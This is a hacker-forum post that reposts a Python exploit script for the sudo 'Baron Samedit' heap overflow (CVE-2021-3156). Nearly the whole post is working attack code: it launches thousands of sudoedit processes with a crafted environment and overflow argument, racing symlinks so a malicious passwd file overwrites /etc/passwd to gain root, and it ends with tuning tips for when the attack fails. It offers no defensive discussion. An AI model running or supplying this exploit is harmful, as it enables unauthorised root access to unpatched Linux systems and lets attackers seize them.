Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)

 Share


Recommended Posts

# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)
# Date: 2021-02-02
# Exploit Author: West Shepherd
# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.
# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31
# CVE : CVE-2021-3156
# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.
# Sources:
# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
# (2) https://github.com/stong/CVE-2021-3156
# Requirements: Python3

#!/usr/bin/python3
import os
import pwd
import time
import sys
import argparse


class Exploit(object):
    username = ''
    size = 0
    data = ''

    def __init__(self, source, target, sleep):
        self.sleep = sleep
        self.source = source
        self.target = target

    @staticmethod
    def readFile(path):
        return open(path, 'r').read()

    @staticmethod
    def getUser():
        return pwd.getpwuid(os.getuid())[0]

    @staticmethod
    def getSize(path):
        return os.stat(path).st_size

    def main(self):
        self.username = self.getUser()
        self.data = self.readFile(self.source)
        self.size = self.getSize(self.target)
        environ = {
            '\n\n\n\n\n': '\n' + self.data,
            'SUDO_ASKPASS': '/bin/false',
            'LANG':
'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
            'A': 'A' * 0xffff
        }
        for i in range(5000):
            directory =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i
            overflow =
'11111111111111111111111111111111111111111111111111111111%s' %
directory

            if os.path.exists(directory):
                sys.stdout.write('file exists %s\n' % directory)
                continue

            child = os.fork()
            os.environ = environ
            if child:
                sys.stdout.write('[+] parent %d \n' % i)
                sys.stdout.flush()
                time.sleep(self.sleep)
                if not os.path.exists(directory):
                    try:
                        os.mkdir(directory, 0o700)
                        os.symlink(self.target, '%s/%s' % (directory,
self.username))
                        os.waitpid(child, 0)
                    except:
                        continue
            else:
                sys.stdout.write('[+] child %d \n' % i)
                sys.stdout.flush()
                os.setpriority(os.PRIO_PROCESS, 0, 20)
                os.execve(
                    path='/usr/bin/sudoedit',
                    argv=[
                        '/usr/bin/sudoedit',
                        '-A',
                        '-s',
                        '\\',
                        overflow
                    ],
                    env=environ
                )
                sys.stdout.write('[!] execve failed\n')
                sys.stdout.flush()
                os.abort()
                break

            if self.size != self.getSize(self.target):
                sys.stdout.write('[*] success at iteration %d \n' % i)
                sys.stdout.flush()
                break
        sys.stdout.write("""
            \nConsider the following if the exploit fails:
            \n\t(1) If all directories are owned by root then sleep
needs to be decreased.
            \n\t(2) If they're all owned by you, then sleep needs
increased.
        """)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        add_help=True,
        description='* Sudo Privilege Escalation / Heap Overflow -
CVE-2021-3156 *'
    )
    try:
        parser.add_argument('-source', action='store', help='Path to
malicious "passwd" file to overwrite the target')
        parser.add_argument('-target', action='store', help='Target
file path to be overwritten (default: /etc/passwd)')
        parser.add_argument('-sleep', action='store', help='Sleep
setting for forked processes (default: 0.01 seconds')
        parser.set_defaults(target='/etc/passwd', sleep='0.01')

        options = parser.parse_args()
        if options.source is None:
            parser.print_help()
            sys.exit(1)

        exp = Exploit(
            source=options.source,
            target=options.target,
            sleep=float(options.sleep)
        )
        exp.main()
    except Exception as err:
        sys.stderr.write(str(err))
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...